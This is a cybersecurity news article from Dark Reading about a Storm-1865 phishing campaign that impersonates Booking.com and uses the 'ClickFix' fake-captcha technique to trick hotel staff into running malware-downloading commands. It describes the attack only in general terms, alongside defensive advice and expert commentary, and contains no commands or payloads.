 [Alexander Culafi, Senior News Writer, Dark Reading](/author/alexander-culafi)March 14, 2025 4 Min Read  Source: ImagePixel via Alamy Stock Photo [](https://www.linkedin.com/sharing/share-offsite/?url=https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme)[](http://www.facebook.com/sharer/sharer.php?u=https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme)[](http://www.twitter.com/intent/tweet?url=https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme)[](https://www.reddit.com/submit?url=https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme&title=Threat%20Actor%20Impersonates%20Booking.com%20in%20Phishing%20Scheme)[](mailto:?subject=Threat Actor Impersonates Booking.com in Phishing Scheme&body=I%20thought%20the%20following%20from%20Dark%20Reading%20might%20interest%20you.%0D%0A%0D%0A%20Threat%20Actor%20Impersonates%20Booking.com%20in%20Phishing%20Scheme%0D%0Ahttps%3A%2F%2Fwww.darkreading.com%2Fthreat-intelligence%2Fthreat-actor-booking-com-clickfix-phishing-scheme) Though the concept of phishing is well established, as are its many variants, there’s an emerging technique known as ‘ClickFix’ that relies on sophisticated social engineering to gain access to a victim.That’s according to Microsoft, which [published threat intelligence on March 13](https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/) regarding a threat actor tracked as Storm-1865. The actor was observed using ClickFix — a technique describing when ‘a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware’ — in attacks primarily targeting the hospitality industry. This particular campaign casts a wide geographical net, as Microsoft said Storm-1865 targeted organizations in ‘North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe,’ most likely to work with travel site Booking.com. That’s because the threat actor was impersonating Booking.com as part of its campaign. Microsoft identified Storm-1865’s threat activity in December, and the company said that as of last month its activities remain ongoing.How ClickFix Works——————Storm-1865 begins its attack by sending a malicious email to the target that has some kind of call to action for the recipient, such as a guest wanting to learn more about a supposed negative review, an account verification, a request, or an offer for a promotional opportunity — all claiming to be from Booking.com. Related:[OpenAI Operator Agent Used in Proof-of-Concept Phishing Attack](/threat-intelligence/openai-operator-agent-proof-concept-phishing-attack)The email then contains a link either directly in an email or in a PDF that leads to a website with a fake captcha over a background designed to look like a Booking.com page. The ‘verification’ instructs the user to use a keyboard shortcut to open a Windows Run window and then paste a command that the page adds to the clipboard. Upon doing so, a malicious payload is downloaded; Microsoft said multiple malware families were observed in the campaign, but noted ‘capabilities to steal financial data and credentials’ in all of them.This use of a verification page alongside a call to action is how Storm-1865 uses ClickFix. ‘This webpage gives the illusion that Booking.com uses additional verification checks, which might give the targeted user a false sense of security and therefore increase their chances of getting compromised,’ Microsoft said.Microsoft urged users to follow good security hygiene to spot phishing emails, including checking the sender’s email address to ensure it’s legitimate, contacting the legitimate provider (in this case Booking.com) directly, searching for typos, checking the URL of a hyperlink, and being wary of calls to action or threats.Related:[MITRE EMB3D for OT -& ICS Threat Modeling Takes Flight](/threat-intelligence/mitre-emb3d-ot-ics-threat-modeling)In an email, a spokesperson for Booking.com writes that while the company can confirm its systems have not been breached, ‘We are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware.”The actual numbers of accommodations affected by this scam are a small fraction of those on our platform and we continue to make significant investments to limit the impact on our customers and partners. We are also committed to proactively helping our accommodation partners and customers to stay protected,’ Booking.com says. ‘It is important to note that we would never ask a customer to share payment information via email, chat messages, text messages or phone.’ Why ClickFix Matters——————–Although calls to action and a sleek webpage are two of the oldest tricks in the phishing playbook, the use of verification as a social engineering tactic is a sophisticated twist on these ideas.Related:[Cybercrime’s Cobalt Strike Use Plummets 80% Worldwide](/threat-intelligence/cybercrime-cobalt-strike-use-plummets-worldwide)Chet Wisniewski, director and global field chief technology officer (CTO) at Sophos, says the technique is ‘certainly thinking outside of the box,’ but as he doesn’t think Storm-1865 is getting copied by other threat groups, he doesn’t think they’ve been a runaway success. One reason for this, he suggests, may be the level of sophistication required from the user.’These attacks require a moderate level of sophistication on behalf of the user,’ Wisniewski says. ‘If you are too tech non-savvy you may be confused by these messages and not be able to complete the task, whereas if you are very sophisticated you are likely to smell a rat.’Wisniewski explains that cybercriminals have been instructing users on how to bypass security controls for many years, and this is just the latest attempt (albeit a slightly more sophisticated one).’Hopefully we can raise awareness about these campaigns to warn off users,’ he says, ‘but additionally admins should be trying to limit administration rights to prevent damage from these types of lures.’ [](https://www.linkedin.com/sharing/share-offsite/?url=https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme)[](http://www.facebook.com/sharer/sharer.php?u=https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme)[](http://www.twitter.com/intent/tweet?url=https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme)[](https://www.reddit.com/submit?url=https://www.darkreading.com/threat-intelligence/threat-actor-booking-com-clickfix-phishing-scheme&title=Threat%20Actor%20Impersonates%20Booking.com%20in%20Phishing%20Scheme)[](mailto:?subject=Threat Actor Impersonates Booking.com in Phishing Scheme&body=I%20thought%20the%20following%20from%20Dark%20Reading%20might%20interest%20you.%0D%0A%0D%0A%20Threat%20Actor%20Impersonates%20Booking.com%20in%20Phishing%20Scheme%0D%0Ahttps%3A%2F%2Fwww.darkreading.com%2Fthreat-intelligence%2Fthreat-actor-booking-com-clickfix-phishing-scheme) About the Author—————- [Alexander Culafi, Senior News Writer, Dark Reading](/author/alexander-culafi) Dark Reading Alex is a writer, journalist, and podcaster based in Boston. [See more from Alexander Culafi, Senior News Writer, Dark Reading](/author/alexander-culafi) Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. [Subscribe](https://dr-resources.darkreading.com/free/w_defa3135/prgm.cgi) More Insights Webinars* [DR, SIEM, SOAR, and MORE: How to Determine the Right Endpoint Strategy for Your Enterprise](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&pc=w_defa7753&ch=SBX&cid=_upcoming_webinars_8.500001526&_mc=_upcoming_webinars_8.500001526)Mar 19, 2025* [What is the Right Role for Identity and Access Management in Your Enterprise?](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&qf=w_dels15&ch=SBX&cid=_upcoming_webinars_8.500001529&_mc=_upcoming_webinars_8.500001529)Mar 26, 2025* [Today’s Top Cloud Security Threats](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&qf=w_wiza63&ch=SBX&cid=_upcoming_webinars_8.500001530&_mc=_upcoming_webinars_8.500001530)Apr 1, 2025* [Memory Safety -& Exploit Management: Real-World Attacks -& Defenses](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&qf=w_defa7921&ch=SBX&cid=_upcoming_webinars_8.500001534&_mc=_upcoming_webinars_8.500001534)Apr 3, 2025* [Unifying Cloud Security: A Blueprint for Modern Threat Resilience](https://dr-resources.darkreading.com/c/pubRD.mpl?secure=1&sr=pp&_t=pp:&qf=w_palo270&ch=SBX&cid=_upcoming_webinars_8.500001533&_mc=_upcoming_webinars_8.500001533)Apr 4, 2025[More Webinars](/resources?types=Webinar) Events* [-[Conference-] Black Hat USA – August 2-7 – Learn More](https://www.blackhat.com/us-25/?_mc=we_bhas25_drcuration&cid=_session_16.500330)Aug 2, 2025* [-[Conference-] Black Hat Asia – April 1-4 – Learn More](https://www.blackhat.com/asia-25/?_mc=we_bhas25_drcuration&cid=_session_16.500329)Apr 1, 2025* [-[Dark Reading Virtual Event-] Cybersecurity’s Most Promising New and Emerging Technologies](https://ve.informaengage.com/virtual-events/cybersecuritys-most-promising-new-and-emerging-technologies/?ch=SBX&cid=_session_16.500328&_mc=_session_16.500328)Mar 20, 2025[More Events](/events)You May Also Like*** ** * ** ***[Threat IntelligenceIran’s ‘Fox Kitten’ Group Aids Ransomware Attacks on US Targets](https://www.darkreading.com/threat-intelligence/irans-fox-kitten-group-aids-ransomware-attacks-on-us-targets) [Threat IntelligenceAttackers Exploit Critical Atlassian Confluence Flaw for Cryptojacking](https://www.darkreading.com/threat-intelligence/attackers-exploit-critical-atlassian-confluence-flaw-for-cryptojacking) [Threat IntelligenceRansomware Group Behind Major Indonesian Attack Wears Many Masks](https://www.darkreading.com/threat-intelligence/ransomware-group-behind-major-indonesian-attack-wears-many-masks) [Threat IntelligenceFortune 50 Co. Pays Record-Breaking $75M Ransomware Demand](https://www.darkreading.com/threat-intelligence/fortune-50-company-pays-record-breaking-75m-ransomware-demand)
Related Tags:
Lemon Sandstorm
NAICS: 72 – Accommodation And Food Services
NAICS: 518 – Computing Infrastructure Providers
Data Processing
Web Hosting
Related Services
NAICS: 92 – Public Administration
NAICS: 721 – Accommodation
NAICS: 51 – Information
NAICS: 928 – National Security And International Affairs
Parisite
UNC757
Associated Indicators: